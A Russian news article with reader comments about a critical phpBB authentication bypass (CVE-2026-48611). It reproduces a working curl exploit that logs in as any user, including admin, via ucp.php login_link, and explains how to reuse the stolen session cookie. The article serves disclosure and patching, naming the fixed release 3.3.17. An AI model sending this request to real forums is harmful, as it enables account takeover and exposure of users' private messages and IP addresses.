Обнаружена критическая уязвимость в phpBB, позволяющая войти в учётную запись любого пользователя

Компания Aikido Security, работающая в сфере кибербезопасности, сообщила о критической уязвимости в phpBB — популярном движке интернет-форумов.

Уязвимость (ей присвоен идентификатор CVE-2026-48611), выявленная ИИ-утилитой Aikido Attack, позволяет полностью пропустить процесс авторизации и войти на форум под учётной записью любого пользователя, включая администратора.

Подробности пока не раскрываются, несмотря на то, что исправление выпущено ещё 6 июня. Уязвимы все версии phpBB, начиная с 3.1.0-a1 и заканчивая 3.3.16/4.0.0-a2. Проблема устранена в выпуске 3.3.17. Владельцам крупных форумов отправлены оповещения.

Портал OpenNET приводит пример рабочего эксплоита:

   curl -i -s \
     -c cookies.txt \
     -b cookies.txt \
     -u 'admin:anything' \
     -d 'login=Login&login_username=admin&login_password=anything' \
     'https://target.example/forum/ucp.php?mode=login_link&auth_provider=apache&login_link_any=1'

Эксплуатация сводится к отправке одного HTTP-запроса с указанием логина жертвы. В файле cookies.txt окажется сессионная кука, которую злоумышленник подставит в свой браузер.

С правами обычного пользователя атакующий может читать личные сообщения пользователя и отправлять посты от имени жертвы. С учётной записью администратора возможности гораздо шире: можно править и удалять чужие посты, банить, разбанивать и удалять учётные записи, а также видеть IP-адреса пользователей.

Атакующий не сможет зайти в панель администрирования из захваченного сеанса, поскольку для этого потребуется ввести пароль, которого он не знает. Тем не менее, представляется возможным следующий сценарий:

@dartraiden
12.06.2026 07:30 UTC
Первоисточник

Комментарии

@KonstLedCloud
12.06.2026 11:46 UTC
0

В статье не упомянуто, но уязвимость эксплуатируется, если используется авторизация с помощью сервера apache

@dartraiden
12.06.2026 11:46 UTC
0

Срабатывает и на nginx. Вот пример одного уязвимого ресурса:

~$ curl --head https://www.example.com/forum/viewtopic.php?p=123456

HTTP/2 200

server: nginx

date: Fri, 12 Jun 2026 11:45:50 GMT

@Zachelovek
12.06.2026 20:47 UTC
0

dartraiden, спасибо, что сделали новость об этой CVE, думаю, что на праздниках пропустил бы.

Хабр, кто успел изучить вопрос, расскажите и нам пжл:

  • Начиная с какой версии уязвимость присутствует? Т.е. как обстоят дела со старыми версиями? У phpBB есть много любителей версии 3.0.*, а также тех, кто сидит на ней вынужденно из-за того, что в 3.1 полностью изменили установку расширений.

  • Есть ли патчи для старых версий?

@dartraiden
12.06.2026 22:50 UTC
0

Уязвимость находится в реализации OAuth (причём, уязвимы и конфигурации, где поддержка OAuth не включена), а она появилась в 3.1

Так что, есть вероятность, что ветка 3.0 не пострадала.

С другой стороны, в 3.0 могут быть свои большущие дыры, просто их никто там пока не ищет. Но Claude Fable уже вышла в релиз...

@GoblinHero
13.06.2026 16:46 UTC
0

Пробовал на своем форуме 3.0. Вроде эксплойт не работает.

@dartraiden
13.06.2026 06:08 UTC
0

В новость добавлен сценарий, следуя которому атакующий может получить доступ даже к админке, осуществив таким образом полный захват форума.

@sviridov_aa
28.06.2026 19:38 UTC
0

заходит в управление группами и добавляет созданного ранее пользователя в главные администраторы

Добавить пользователя в группу без доступа в админку довольно редкий сценарий, обычно серьёзные группы от этого защищены.